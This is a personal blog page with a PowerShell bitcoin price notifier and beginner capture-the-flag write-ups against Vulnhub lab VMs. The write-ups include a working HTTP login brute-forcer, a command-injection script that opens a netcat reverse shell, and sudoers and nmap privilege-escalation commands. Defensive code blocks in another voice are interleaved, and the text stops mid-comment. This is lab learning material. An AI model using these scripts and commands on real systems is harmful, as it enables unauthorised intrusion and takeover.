Let's Code! Bitcoin Price Notifier by Ben from 1 August 2020



So I am sure that all of you are as obsessed with bitcoin as I am lately? Right?

I am tired of constantly refreshing a browser window or my Cash App to see what the current price is. So I wrote a very simple notifier in powershell. I call this new script... Bitcoin Price Notifier. Gripping huh?

Every minute or so (you can totally change this timing) it goes out to the internet and gets the price of bitcoin. It then compares it to the price that it had previously. And since we are being lazy we don't want to just display that, no no, we want to hear it. It's better this way. We don't have to tab out of what we are doing. It just tells you that the price is either up or down, by how much, and what the current price is using a super sexy Microsoft Sam voice. Copy paste the code into a text editor and save it as a .ps1 file. Simply run this script by right clicking your new .ps1 file and selecting Run with PowerShell. You could minimize the window or you could obsessively stare at the price updates... but I wouldn't. Now go about your life while getting soothing voice notifications about whether or not your money is burning up in server flames or building up into crypto millions.

Here is the code:


Add-Type -AssemblyName System.Speech
$Voice = New-Object System.Speech.Synthesis.SpeechSynthesizer

# Fetch the "price dropped" sound once and load it into a media player
$Napalm = "https://millersecurityresearch.com/files/scripts/sounds/Napalm%20Death%20-%20You%20Suffer.mp3"
$Path = Join-Path $Env:Temp "Napalm Death - You Suffer.mp3"
$Webclient = New-Object System.Net.WebClient
$Webclient.DownloadFile($Napalm, $Path)
Add-Type -AssemblyName PresentationCore
$MediaPlayer = New-Object System.Windows.Media.MediaPlayer
$MediaPlayer.Open($Path)

# CoinDesk returns the rate as a formatted string such as "11,345.6789".
# Strip the thousands separators and cast it so the comparisons and the
# subtraction below are numeric (comparing the raw strings, or subtracting
# "11,345.6789" - "11,300.1234", does not do what we want).
function Get-BtcRate {
    $Response = Invoke-WebRequest -Uri "https://api.coindesk.com/v1/bpi/currentprice.json" | ConvertFrom-Json
    return [decimal]($Response.bpi.USD.rate -replace ',', '')
}

$StartingRate = Get-BtcRate
Write-Host "Starting BTC: $StartingRate"

While ($true) {
    Start-Sleep -Seconds 60    # polling interval; change this to taste
    $CurrentRate = Get-BtcRate
    $VoicedRate = $CurrentRate.ToString("N0")    # whole dollars for the voice
    If ($StartingRate -gt $CurrentRate) {
        $Difference = $StartingRate - $CurrentRate
        If ($Difference -gt 25) {
            $MediaPlayer.Play()
        }
        $Voice.Speak("Bitcoin Down by " + $Difference.ToString("N0") + " Dollars to " + $VoicedRate)
        Write-Host "Current BTC: $CurrentRate - Down"
    }
    If ($StartingRate -lt $CurrentRate) {
        $Difference = $CurrentRate - $StartingRate    # positive amount for the voice
        $Voice.Speak("Bitcoin Up by " + $Difference.ToString("N0") + " Dollars to " + $VoicedRate)
        Write-Host "Current BTC: $CurrentRate - Up"
    }
    If ($StartingRate -eq $CurrentRate) {
        $Voice.Speak("Bitcoin same at " + $VoicedRate + " Dollars")
        Write-Host "Current BTC: $CurrentRate"
    }
    $StartingRate = $CurrentRate
}


Pumpkin Raising. by Ben from 20 July 2019


Well, I worked on Pumpkin Raising, part two of the three part VMs series I was working through, for about a day and a half. I got really far. But, I started to get frustrated. I had gotten 1 of the "seeds" already. I found it in a hidden .pcap file. I had a gpg file to crack or figure out the password for. I was sure it contained another seed. And I had gotten a .gif image that was hidden in the code of one of the web pages. I was positive that it had another seed in it as well. I found a bunch of secret messages and decoded them. One secret message contained a bunch of what looked like credentials. None of them worked.

So the gpg file. I tried every combination of credential, secrets, and words that I could think of. I couldn't get the damn thing to unlock. I worked on this for like.. I don't know.. an hour. I was going to start a bruteforcer on it but I didn't know if I wanted to wait the weeks it could take to find the answer. I failed to open the file.

Next the pictures. I was sure that one of the pictures had a steganographic message in it. Again, I tried every combination of password and word I could think of. I used steghide and stegosuite. I tried every bit of text from the secret messages I had been finding. I tried a lot. I worked on this for about 2 hours or so. I thought again about bruteforcing it. There aren't any programs to do that but I could whip up a python script to do it I'm sure. I failed to extract any hidden messages from the photos.

I never found the location of the 4th seed myself. And this one hurts the most! Out of them all, this failure was the biggest. I just straight up didn't find it.

So this morning, I impulsively and foolishly looked up a walkthrough. I... was... so... close... FUCK!!! Why did I do this? Ooook, So first the gpg file, the password was just a combination of big bold ass words from one of the webpages... I should have tried more things before I gave up. I mean they were three big BOLD ass words. It did have a seed in it as well. Lesson learned; don't be a quitter! The .gif file. It WAS steganographically encoded and DID have a secret message hidden with stegosuite in it as well. I was completely on the right track with this one. I'm sure I even tried the key that eventually unlocks the message. I just didn't get it for some reason. I was closer on this one than the gpg file for sure. Lesson learned; don't be a damned quitter! Then seed four.. You bastard. Seed four is one that I think I learned the most from. Seed four was literally just down at the bottom of the source of one of the pages. I had no excuse not to have seen it. If I had just scrolled down.. to the bottom.. I would have seen it clear as day. Clearly, this is a super simple troll. But, I have to admit it got me. Lesson learned; observe your surroundings you big stupid idiot, and don't be such a fucking quitter.

Well with those failures under my belt, and the cheating already having taken place, there is literally no reason to finish the damned thing. I bowed my head in disgrace. Turned the VM off. Right clicked it. Selected remove. It asked what I would like to remove. I selected all files.

Tune in next time to hear about part 3; Pumpkin Festival. Let's see if I can apply the lessons learned from part 2 and finish this series without needing to go find answers.


I popped the PumpkinGarden! by Ben from 18 July 2019


This time I wanted to pop a box without cheating. I am not going to look up any answers at all. Let's do this! To start, I went back to VulnHub and got me a VM. I picked Mission-Pumpkin v1.0: Pumpkin Garden. The description states it is part one of a three VM series. So here we go. I start by doing a quick Zenmap of the network. The VM was given 192.168.1.105. I did an all ports scan on that IP. It came back as having 3 ports open. An FTP server on port 21 with anonymous logins enabled. A webserver on port 1515 and an SSH server running on port 3535.

I started with the FTP server. It had a note in it that said:



I think it is safe to assume that jack is a user we will encounter later. I wasn't able to login to the FTP server as that user though. Next I checked out the web server. It has a cutesy lil site on it. I checked out the code on the site. I noticed right away a comment in the code.



Clearly they want us to look at the images on the site to go forward. The code also reveals the images on the site are in an img/ directory. I look for these in webcode anyways because open web directories are my favorite source of pirated media. So I go to that. It has a good number of files and another directory that looks fairly juicy!



I downloaded all the images. I also look at the secret note. The secret note is nothing but a bunch of gibberish. Based on the note left in the website code I was sure these images were important. I have heard of steganography before. Steganography is where you hide a message in the data of an image. Then you can send that image in the clear without fear of adversaries knowing it has a message in it. It just looks like a cat.. or in this case a pumpkin. Kali doesn't have any steganography programs built in so I did a fast "apt install steghide stegosuite". That installed two tools Steghide and Stegosuite that are used to encode and decode steganographic messages. I fiddled with these for like an hour. I tried every picture with every combination of passwords I could think of. And I did this in both applications. Nothing yielded any results.

I started to look at the "clue.txt" text again. It was just garbage, but what if it was just encoded? I know with my work using Powershell that base64 is a really common encoding algorithm. So I googled a decoder, popped the text into it... and BAM! POO! POW! a set of credentials!!!



This set me in motion and the rest of the box only took about another 30 minutes. That set of creds let me SSH into the box as the scarecrow user. In that user's home directory was a "note.txt" file.



That note then gave me the set of credentials needed to login as the "goblin" user. However, before I went I made sure that I couldn't run any commands as sudo and that I couldn't find any more interesting files. So I logged in as goblin and did a "sudo -l".



OH WOW! I can run any program except for /bin/su as root. You can tell this by the ! in front of /bin/su. There was also a note in the home folder. Checking that out gives me the link to some exploit code that if run as goblin would presumably escalate us up to root. However, since I can run anything as root I decided to revisit the technique I learned yesterday. I wasn't going to use their code at all. Instead I went about adding permissions to the sudoers file with tee. I checked to make sure that the box had tee on it. It does. Perfect. I simply add ALL ALL ALL permissions to my boy goblin. Do a fast "sudo -l" it states I have full permissions. So I "sudo su" up to root. Bingo Bango! Box popped!





I did my first box without looking up an answer! I feel accomplished.


DC-4. I still needed help. by Ben from 18 July 2019


I booted up DC-4 and got to the login screen. I tried the simple stuff like admin admin and admin password, you know for shits and giggles. It obviously didn't work. So I fired up Zenmap and found the box on the VM network. It came back as having an IP of 192.168.1.103 and it had ports 22 and 80 open. So I open up a web browser, go to the IP, and get a super simple login page.

First things first, let's check out the code of this site. Looking it over, the code is very short and not very complicated. The page is a simple webform to submit a set of creds to a login.php script. Unfortunately, there is no way for me to view this script yet. Not without first being able to get past the authentication. I could bruteforce either one, I guess. In fact, I have scripts to brute force html forms and ssh servers that I have already made. So... that is the next thing that I decide to do. I fired up my Windows 10 developer VM. I then went to my website and visited my article titled “Let's Code! An HTTP/HTTPs Bruteforcer." I copied the code from the final function and made a new script file on my Windows 10 VM. I pasted the function into it and went about editing it. I won't go into detail about what it does. That is what the other article is about. I added some outputs so I could see its progress and I modified the final conditional if to a condition that can only be met if the user is logged in, or so I think. Anyways, after some fiddling I got it working and set it on the task of brute forcing the password for the admin account. I don’t feel like the password will be super hard as this was a beginner box. Because of this I used a smaller word list that only contains English words. If it doesn't work I’ll try a bigger wordlist. Here is my script bruteforcing the logins.



It was taking a very long time. I suppose the script could be threaded to speed it up but I just let it continue on. It ran for more than 2 hours and only made it to the c’s… If I need to use a bigger list I am going to need to multithread this thing. For now I am going to let it run and come back after a while.

I stopped it. It was taking forever. I was staring at it, watching it run. And I realized that the first webrequest is inside the foreach loops. Meaning it does 2 web requests every time. This is not optimal. I only need the first webrequest to get the form data and to get a session started. I don’t need to do it every time. So I stopped it. I edited it a lil. I chopped off the top of the wordlist, just to get me back to where I was already. And started it up again. This time it ran much faster! It had gotten through about 52k guesses before I stopped it. It ran for 3 hours, so that’s like 17k guesses an hour or 288 guesses a minute, give or take. That’s pretty good, I guess. I let this new edited one run for a decent period of time. I want to figure out the guesses per hour and minute now that it is only doing one webrequest per guess as opposed to two. So that we can compare them. After about 30 minutes-ish I did some basic numbers. The script was up to 30k guesses an hour or 490 guesses a minute. That is much better. Almost double! I guess that makes sense as I did take away half the work each guess has to do. The wordlist I am using has 345k passwords left to guess. So at 30k an hour at max this list will take another 11 hours to complete before it has exhausted all the English words. If that doesn’t give me something I will have to go back to the drawing board. I let it run.

Time Passes….

I googled some.. I may have seen an article that had the actual password in it. I did the math. It would take 3 hours to get to the password. I just went ahead and cheated. I chopped off the wordlist to a bit above the password. I ran the script… it went right past the password. It didn't stop. My stop condition was not valid. I would have let the entire thing run endlessly and it would have never worked. I logged in just to make sure that the password was correct. It was. I could easily edit my script to look for something on this page and stop when it sees it.. But without cheating I wouldn’t know anything about this page. So I decided to look for a way to determine that the page has changed and that the login was successful without knowing anything about the page beyond. I coded for like an hour.. But then found what I think the problem may have been. I think I may have been setting the field names incorrectly…. YEP!... fml…

Well these things happen. I should have re-read my own article. I would have caught this right off. But I didn’t. Just a few hours wasted. I re-ran the code with a condition to check for the length of the raw content. It stopped but one off from the actual password. So close. So I went back to an older condition to stop and gave it another go. Nope… I’m going backwards. Ok this time it stopped again.. But again one off from the actual password. Once I start to think about it I think this makes sense. The session I am using is not logged in until I send the successful request. Then the subsequent request gets a different page because it's actually logged in. So how can I fix this? I tried a bunch of crap.. Nothing worked. The content length thing actually worked just one off.. So how can I fix that? Easy just put a last word variable in above the loops. Every loop it will update the word variable after it checks the condition. Then it will add the correct password to the output file by just outputting the last password it tried before the loop stopped. That worked! I finally got the correct password using my script. I could have tried the passwords above and below the one it stopped on I guess but I don’t know if I would have done that in a real pentest. I am glad that I fixed my script to be able to find the password but I still knew what it was and was able to test it. With that knowledge I could have made a working script it just would have taken days to test every change. I would have given up on that. It wouldn’t be feasible. Here’s the final script. This will actually output the correct password if you have it in your wordlist.

function Http-Bruteforcer-C4 {
    Param
        (
         [string] $PathtoUsernames,
         [string] $PathtoPasswords,
         [string] $PathtoOutput
        )

    $usernames = Get-Content $PathtoUsernames
    $passwords = Get-Content $PathtoPasswords
    $urlofserver = "http://192.168.1.103"
    # One request up front to grab the form and start the session (not one per guess)
    $request = Invoke-WebRequest -Uri $urlofserver -SessionVariable ses
    # Remembers the previous guess, because the session only shows as logged in
    # on the request *after* the successful one
    $lastpassword = ''

    Foreach($username in $usernames)
        {
        Foreach ($password in $passwords)
            {
                $form = $request.Forms[0]
                $form.Fields["username"] = $username.ToString()
                $form.Fields["password"] = $password.ToString()
                $url = $urlofserver + "/" + $form.Action
                $request2 = Invoke-WebRequest -Uri ($url) -WebSession $ses -Method POST -Body $form.Fields

                $write = 'Trying ' + $username + ' and ' + $password
                Write-Host $write

                # 506 is the raw content length of the failed-login page on this box
                If($request2.RawContentLength -ne 506)
                {
                    $output = $urlofserver + ", " + $username + ", " + $lastpassword
                    $output | Out-File -Append -FilePath $PathtoOutput
                    break
                }
                $lastpassword = $password
            }
        }
}

Http-Bruteforcer-C4 -PathtoUsernames 'C:\Users\IEUser\Desktop\dc4\users.txt' -PathtoPasswords 'C:\Users\IEUser\Desktop\dc4\english.txt' -PathtoOutput 'C:\Users\IEUser\Desktop\dc4\output.txt'


I am going to try this script again on the next box or machine in which I have to break a web form. This actually was a good lesson and reason to revisit my original script and work on it some.

Turns out the wordlist I was using did have the correct password in it the entire time. So if I had used a tool that already exists I would have gotten it. So let’s do that just for posterity's sake. In the real world I would just be using pre-written tools anyways. I looked around and it looks like burp suite is what we wanna use for this. Kali has it built right in. Turns out the burp suite while easier to use… was just as slow if not slower. Actually.. It was like 50 tries per second slow. I stopped that right away.. Turns out my script is the way to go. I just need to keep in mind the new lessons that I have learned for next time. Even wasting the entire day like I did it still would have found the password faster than if I had fed the same list through burp suite. It would have found it though.

Let’s just move on now. So we can view the login.php now that we have found the password. I login to use the web browser. This shows me another simple page. I check over the code on that. It has a call to another php file called “command.php". I click that link and it loads up another small page that displays some options. The new command.php page lets you list some files, run a disk usage command or run a command to see how much disk space is left. The output of these commands is just normal linux shell output. Looking at the code of the page I can see that the php code is submitting regular linux shell commands like “ls -l" to get the file list. Hence the regular shell output.



I bet I could send any command to this php page and have it run it. Let’s try. I am going to go back to my Windows 10 VM and fire powershell up again. I used the creds from before and the same type of web requests to submit a custom netcat command to start a reverse shell. On my Kali box I have a netcat listener running. Running the following bit of script actually does start a reverse shell!!!


$request = Invoke-WebRequest -Uri 'http://192.168.1.103' -SessionVariable ses
$form = $request.Forms[0]
$form.Fields["username"] = 'admin'
$form.Fields["password"] = 'happy'
$url = "http://192.168.1.103/" + $form.Action
$request2 = Invoke-WebRequest -Uri $url -WebSession $ses -Method POST -Body $form.Fields
$url = "http://192.168.1.103/command.php"
$request3 = Invoke-WebRequest -Uri $url -WebSession $ses
$form2 = $request3.Forms[0]
$form2.Fields["radio"] = 'nc 192.168.1.100 9999 -e /bin/bash'
$form2.Fields["submit"] = 'Run'
$request4 = Invoke-WebRequest -Uri $url -WebSession $ses -Method POST -Body $form2.Fields
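Seen from the side of whoever maintains a page like command.php, the mistake is that the form value is the command. The Python below is an added example for this page, not the VM's PHP and not the author's code: it puts the same unsafe pattern next to the fix, which maps each menu option to a fixed argument vector and never hands user input to a shell, plus a helper for the case where a user-supplied value genuinely has to reach the command. The option names and argument lists are constructed to mirror the three options the page describes.

```python
import os
import subprocess

# Constructed menu standing in for command.php's three options: the form sends
# the key, the server decides what that key means.
COMMANDS = {
    "list": ["ls", "-l"],
    "usage": ["du", "-sh", "."],
    "free": ["df", "-h"],
}


def run_unsafe(value):
    """The vulnerable pattern: whatever arrived in the form field is passed to
    a shell verbatim, so 'ls -l; <anything>' runs the anything as well."""
    return subprocess.run(value, shell=True, capture_output=True, text=True).stdout


def is_accepted(value):
    """Allowlist check: only the predefined option names are valid input."""
    return value in COMMANDS


def run_safe(value):
    """Hardened version: the field selects one of the fixed argument vectors and
    anything else is rejected.  With shell=False no shell ever parses the
    command, so ';', '|', '$(...)' and friends are never interpreted."""
    if not is_accepted(value):
        raise ValueError("unknown option: %r" % value)
    return subprocess.run(COMMANDS[value], shell=False, capture_output=True, text=True).stdout


def resolve_under(base, user_path):
    """When a user value really must become a command argument (here a path),
    normalise it and refuse anything that escapes the allowed base directory.
    Returns the resolved path, or None if it is outside base."""
    base = os.path.realpath(base)
    full = os.path.realpath(os.path.join(base, user_path))
    return full if os.path.commonpath([base, full]) == base else None


def list_dir(user_path, base="/var/www/files"):
    """Safe use of a user-supplied argument: validated, then passed as one argv
    element, so it can only ever be a path, never a second command."""
    full = resolve_under(base, user_path)
    if full is None:
        raise ValueError("path escapes %s" % base)
    return subprocess.run(["ls", "-l", full], capture_output=True, text=True).stdout


def handle_form(fields):
    """Mimic the page handler: `fields` is the decoded POST body."""
    return run_safe(fields.get("radio", ""))
```

The difference that matters is not input filtering but where the decision is made: in the hardened handler the server owns the complete command line and the client only picks an entry from a table. Denylisting characters in the unsafe version is a losing game, since the shell has many ways to chain commands.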


Doing an ls on the home directory gives us a list of users:
  • charles
  • jim
  • sam

These could be used to bruteforce the SSH server. Looking into each of the folders I find that only Jim’s has any files in it. Conveniently for us in Jim’s backup folder there is a wordlist called old-passwords.bak. Luckily for me I already have a working SSH brute forcing script. Check out “Let's Code! An Ssh Bruteforcer." I also modified it a little bit to include some output and to exclude some errors it tosses out. I looked at the new wordlist that we got. It had duplicates in it. I used Notepad++ to sort the file then I used it to remove the consecutive duplicates. After that I went ahead and fed the usernames and passwords lists into my bruteforcer and let it run. It finished without any success. WTF… why doesn’t it work anymore? I don't know, it is getting late in the day now and I just wanna beat this box! So I went ahead and fed the wordlist into Ncrack, a tool on Kali. It found the password for the user jim. It was “jibril04". I tried to SSH in. It worked! So now we are logged in as a local user!



Skip to the next morning, I had to start digging into my new user Jim. I couldn’t find any ways to escalate like before. Luckily I found this site which talks about how to find ways to escalate privileges on a linux machine. I made it to the useful commands to find credentials section. Using the commands from the site. I searched for any file that had the string “Password" in it. I found one! It lives in /var/mail/jim. It is a mail message of Jim sending a password to another user, Charles. I guess I should have been looking for something like this all along. Jim did have a “mbox" file in his home directory which was also an email message.

The creds we just found now allow me to switch to Charles. First thing I do as Charles is run “sudo -l" it turns out he has permissions to run a bin called “teehee" as root. Looking at the bin shows that it is a copy of the program tee, just renamed. I’ve never used tee before. Reading around it looks like it's just for recording console outputs to a file. How can I use that to my advantage? Well the options do say that it can append the output to a file. I bet since we can run it as root we can output to any file on the system. I looked up the syntax to add user permissions to the sudoers file. If I can run anything as sudo then I’m root. My new plan is to add ALL ALL sudo permissions to a user I already have logged in, like Jim. I ran the following command: “echo “jim ALL=(ALL) ALL" | sudo teehee -a /etc/sudoers". It just gave me back the echo. I went over to the Jim console which was still logged in. I typed in “sudo -l", it listed my permissions as ALL ALL! A quick “sudo su" and boom we are root. FINALLY! A root shell and the flag! Hot damn! It only took me 2 full days to figure this one out. I am more of a beginner than I thought I was. I gotta keep working at this.






My first box pop in 10 years. DC-6 by Ben from 17 July 2019


Tonight I wanted to start my OSCP / pentesting practice. So, I go to Vulnhub and start scrolling through the list of VMs. I found a few that said they were for beginners and I downloaded them. I got DC-6, DC-4, and Sputnik. I started with DC-6 because it finished first. The VM information said that the interface would be set to DHCP and that I should add a host entry to my hosts file for the hostname of “wordy" for whatever IP the machine gets. It also said in the hints to run the following command: “cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt". This command tells me at least a little information. We are going to be cracking a password. The password is in the rockyou.txt (which is included in Kali). And it includes that string “k01" in the successful password. The cat command that we will run is looking at the rockyou.txt wordlist, piping it to grep and then grep is writing to a new file all the strings with “k01" in them. So we will have a new smaller list of passwords to use in our password cracking attempts.

I imported the OVA into VirtualBox. I changed the interface to be on the internal network (going through my pfsense box) VM network. Then I booted it up. This got me to a login screen. I couldn't do anything. I tried basic stuff like admin admin and admin password etc just for fun. It didn't work obviously. So I fired up Kali and Zenmap. I gave the VM network a good old scanning. DC-6 showed up as 192.168.1.102. It said it had ports 22 and 80 open. Since I got the IP of 192.168.1.102 for this VM that's what I'll need to add to my hosts file. It now looks like this:



Using a web browser and just typing in “http://wordy" brought me to a WordPress blog.



I’m not ashamed to admit that this is where I hit a brick wall. I have never done this before after all. I really wasn’t sure which direction to go in. I went over the code of the WordPress site for a bit. I didn’t see anything particularly interesting. It looked like any other WordPress site. I remembered back to the hints and went ahead and ran the command to prepare my wordlist. I figured I’d need it to break into this box.

So I started to google. I found this YouTube clip of a guy's walkthrough of this box. It's a new video put out by the user Moaz Ghawji. However, the video is in a foreign language. But I am treating this like the tutorial level of a game and treating my foreign friend in the video as my level guide. I know some may consider it cheating but again I’m treating it like more of a tutorial. I watch until the guy gets caught up with me. The next thing he does is run WPScan, a WordPress vulnerability scanner. He runs it to enumerate any possible users. So I do the same. We ran the following command “WPScan --url http://wordy -e". I get the following list of names:

  • admin
  • jens
  • graham
  • mark
  • sarah


I really wish I knew more about how this command gets the usernames from the WordPress server. Possibly that is an article for another time. So we get this list of usernames. Now it’s time to crack one of them. Again using WPScan, we point it at a file containing the usernames and we also point it at the wordlist we created earlier. Then we let it go to work cracking the usernames and passwords by using the following command “WPScan --url https://wordy -U users.txt -P passwords.txt". After a few minutes I got the following output.



BOOM! We got one! I immediately want to log into the admin console of the WordPress instance. You do this by going to http://wordy/wp-login.php it is just a standard WordPress login page. And and and…. It let me in! We are at least into the WordPress now! So where do we go from here?

Looking at the Users tab showed me that the previous usernames were correct. So far I’ve learned about WPScan, a tool I didn’t even know existed. And I’ve learned that it can accurately enumerate WordPress users. As well as bruteforce WordPress login attempts. I also learned that these are legit over the wire login attempts.



So what next? Following the video as a guide, the next step is to find a way to escalate to a local machine user. Looking at the WordPress user panel we can see that they are using the activity monitor addon. Using a tool called searchsploit we can search to see if there are any known vulnerabilities in this plugin. And as it turns out there is:



This searches our local exploit database for any known exploits for the term activity monitor. After we find one, we then copy the html page to our desktop. After that we are going to go into the source and do some slight editing. In the source there is a line calling to localhost, we want to replace this with “wordy" as this instance is not running on our local host. We also need to edit a call to the local host IP and instead put in the IP of the “wordy" box.



From what I can tell the exploit works like this.. You open the html from the exploit page and hit the submit button. That then sends a web request to the activity monitor. However, this webrequest also runs a netcat command as well. That netcat command is our way in. We start a netcat listener on our Kali machine. The netcat command in the exploit will be run on the web server and open a reverse shell back to our Kali machine. So I started a listener… ran the exploit in a browser.. BOOOOOMMM!!! My first reverse shell exploit completed!

So now that we have a shell who are we? We are now www-data, the user running the web server. What can we do? Well we can run any command that this user can run and we can access any files they can access. So let’s explore around a bit. In Mark’s home folder I found a folder called stuff. In Jen’s home folder I found a backup.sh script. Looking in Mark’s stuff folder I find a file called things-to-do.txt. It says the following:



That’s right. It contains another username and password in it! I tried to login to the WordPress portal with these creds. No dice! So let’s try them on the SSH server…. That’s it! They were SSH creds! So now we are in as an SSH user. I bet we won’t need our reverse shell anymore after this. Looking around as the “graham" user doesn’t really show me any more files that I can look at. Running the “sudo -l" command checks what permissions I do have on the system. We can see that the backup.sh script pops up again, this time it says it is a script that I can run.



Let’s go check out that script. It is just a script to zip up a file. Watching my foreign video friend, he just puts /bin/bash at the end of it then runs the script as the user “jens" with the following command “sudo -u jens /home/jens/backups.sh". Since the script is being run as another user and since the script is just calling another shell, this allows us to now have a shell as the “jens" user. See how the username changes:



Running the same “sudo -l" command as jens shows that we can run the nmap program as root with no password as well. Until my foreign teacher showed me… I had no idea that nmap contained a scripting function in it. We make a fast file containing an nmap script. Making the script is pretty easy just run the following command “echo “os.execute(‘/bin/bash’)" > /tmp/root.nse" all it will do is run nmap and then use it to open a bash terminal. Cool thing is if we run it as sudo we are now root. Looking into the root directory shows us the flag .txt file. Then we can cat the flag… and WE WON!
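Three of the boxes on this page fell to the same class of sudoers mistake: Pumpkin Garden's "ALL except !/bin/su", DC-4's renamed copy of tee, and DC-6's script runnable as jens plus nmap as root with no password. The Python below is an added example for this page, not the author's code and not taken from any of the VMs: a small auditor that parses simplified sudoers user specifications and flags negated entries (which sudo's own manual says do not effectively subtract from ALL), well-known file-writing and shell-spawning programs, NOPASSWD, and targets writable by the invoking user. Because a renamed binary defeats name matching, it also compares the allowed program's content hash against the known-dangerous ones. The sample rules, the /usr/bin/teehee path, the runas users and the fake digests are assumptions constructed for the example; the digest and writability checks are injectable so it can run against that constructed data as well as a real system.

```python
import hashlib
import os
import re
from collections import namedtuple

# Binaries that, once allowed through sudo, amount to root: they write arbitrary
# files (tee appending to /etc/sudoers) or spawn a shell (nmap's os.execute).
FILE_WRITERS = {"tee", "dd", "cp", "mv"}
SHELL_SPAWNERS = {"nmap", "vi", "vim", "less", "find", "awk", "perl", "python3", "bash", "sh"}

# Simplified sudoers user specification:  user host=(runas) [TAG:] cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

Finding = namedtuple("Finding", "user command reason")


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def parse_rule(line):
    """Return (user, runas, tags, [commands]) or None for comments/Defaults/garbage."""
    line = line.strip()
    if not line or line.startswith(("#", "Defaults")):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas = (m.group("runas") or "root").strip() or "root"
    return m.group("user"), runas, m.group("tags"), [c.strip() for c in m.group("cmds").split(",")]


def reference_digests(digest):
    """Digest -> name for the known-dangerous binaries, so a renamed copy such as
    'teehee' is recognised by content rather than by basename."""
    refs = {}
    for name in FILE_WRITERS | SHELL_SPAWNERS:
        for d in ("/usr/bin", "/bin"):
            try:
                refs[digest(os.path.join(d, name))] = name
            except (OSError, KeyError):
                pass
    return refs


def audit(lines, digest=sha256_of, writable=None):
    """Findings for the given sudoers lines.  `digest(path)` and `writable`
    (a set of paths the invoking user can write) default to the real filesystem."""
    refs = reference_digests(digest)
    findings = []
    for line in lines:
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, runas, tags, cmds = parsed
        if "NOPASSWD" in tags:
            findings.append(Finding(user, ", ".join(cmds), "NOPASSWD: runs as %s with no authentication" % runas))
        for cmd in cmds:
            path = cmd.split()[0]
            if path.startswith("!"):
                findings.append(Finding(user, cmd, "negation: '!' does not subtract from ALL; another shell or a copy of the binary still runs as %s" % runas))
                continue
            if path == "ALL":
                findings.append(Finding(user, cmd, "ALL: any command as %s" % runas))
                continue
            name = os.path.basename(path)
            if name in FILE_WRITERS:
                findings.append(Finding(user, cmd, "%s can write any file as %s, including /etc/sudoers" % (name, runas)))
            elif name in SHELL_SPAWNERS:
                findings.append(Finding(user, cmd, "%s can spawn a shell as %s" % (name, runas)))
            else:
                try:
                    known = refs.get(digest(path))
                except (OSError, KeyError):
                    known = None
                if known:
                    findings.append(Finding(user, cmd, "renamed copy of %s (matched by content), same risk" % known))
            is_writable = path in writable if writable is not None else os.access(path, os.W_OK)
            if is_writable:
                findings.append(Finding(user, cmd, "file is writable by the invoking user; whatever they put in it runs as %s" % runas))
    return findings


# Constructed rules modelled on the three write-ups (paths and runas users are
# assumptions; the VMs' real sudoers files are not on the page).
SAMPLE_RULES = [
    "Defaults env_reset",
    "goblin  ALL=(ALL) ALL, !/bin/su",
    "charles ALL=(root) /usr/bin/teehee",
    "graham  ALL=(jens) /home/jens/backups.sh",
    "jens    ALL=(root) NOPASSWD: /usr/bin/nmap",
]

if __name__ == "__main__":
    for f in audit(SAMPLE_RULES):
        print("%-8s %-28s %s" % f)
```

The fix in every case is the same shape: grant the narrowest specific command with fixed arguments, keep the target file and its directory unwritable by the user who may sudo it, and never try to build a denylist out of ALL. Run against a real host the script hashes the system's own tee, nmap and friends, so a copy under any name is still caught.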



Really I wouldn’t have gotten very far without that video.. But I think we all need to start somewhere. I learned a lot about enumeration and privilege escalation. I also learned that I need to stick to it more and try more things out before I go running for a walkthrough. Warm up over. I’ll tackle DC-4 without help and see how far I can get… next time.


Getting a VM lab started by Ben from 10 July 2019


I want to start researching and learning the skills required for my OSCP. I think it would be pretty rad to get a job as a pentester and I personally know people who have gotten jobs with their OSCPs. I got some books to work through. I have done a bunch of reading and video watching. Now... Now it's time for some action! So, I am at a point where I am wanting to get a VM lab going.

I updated VirtualBox. Cleared out all my old VMs. Downloaded a fresh copy of pfSense, Kali, Windows 10, I am also downloading a number of isos from Vulnhub.

I setup the pfSense VM first. I configured the VM to have 2 interfaces. Interface one was natted to my host PC's NIC and the second interface is set to internal. This will act as my router and gateway to internet. Mainly though, I want this because I am going to set up some rules before I start spinning up rando isos from the internet. I am going to try to make sure I don't have any routes into my home network or host PC. All other VMs will have their one network interface set to internal so that they will have to go through the pfSense VM for network access.

I got the Kali VM installed first, as it was the first one to finish downloading. Once Kali was booted, I got into the pfSense box using its web browser and ran through the initial webConfigurator setup. I then shut them both down, cloned the VMs, and called the clones the "master clones". I will do this for every VM that takes any type of setup. These clones are the base installs without any modifications that could mess them up. Why do this? In the past I have had problems with certain Linux VMs just blowing up after updating them. So, for this Kali VM: now that I have a master clone that I know is good, I'll update the original. If the update completes successfully then I'll make another clone, and I will use that one to work from. I am going to make one clone per research instance. That way, every time I start researching an ISO or web service or whatever, I will have a fresh, up-to-date Kali with no old artifacts that may trip me up or confuse me.
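Scripting that topology keeps it reproducible. The following VBoxManage script is an added example, not something from the post: it puts pfSense's first NIC on NAT and its second on an internal network, puts every other VM only on that internal network, takes the master clones, and includes a check over showvminfo output for any adapter that would bypass the gateway. The VM names (pfsense, kali, win10) and the network name labnet are assumptions, and DRY_RUN=1 (the default) just prints the commands instead of touching VirtualBox.

```shell
#!/bin/sh
# Added example, not the post's own commands: wire the lab the way the post
# describes with VBoxManage (pfSense NIC1 on NAT, NIC2 on an internal network,
# every other VM only on that internal network) and take a "master clone".
# VM names and the internal network name are assumptions; DRY_RUN=1 prints
# the commands instead of running them.
DRY_RUN="${DRY_RUN:-1}"
LAB_NET="${LAB_NET:-labnet}"

vbm() {
  if [ "$DRY_RUN" = 1 ]; then printf 'VBoxManage %s\n' "$*"; else VBoxManage "$@"; fi
}

# Gateway: NIC1 NAT (the path out to the internet), NIC2 on the internal lab
# network. Promiscuous mode stays "deny" on the lab side; nothing needs to sniff.
configure_gateway() {
  vbm modifyvm "$1" --nic1 nat --nic2 intnet --intnet2 "$LAB_NET" --nicpromisc2 deny
}

# Every other VM gets exactly one NIC, on the internal network, so its only
# route anywhere is through pfSense. Disabling NIC2-4 guards against a
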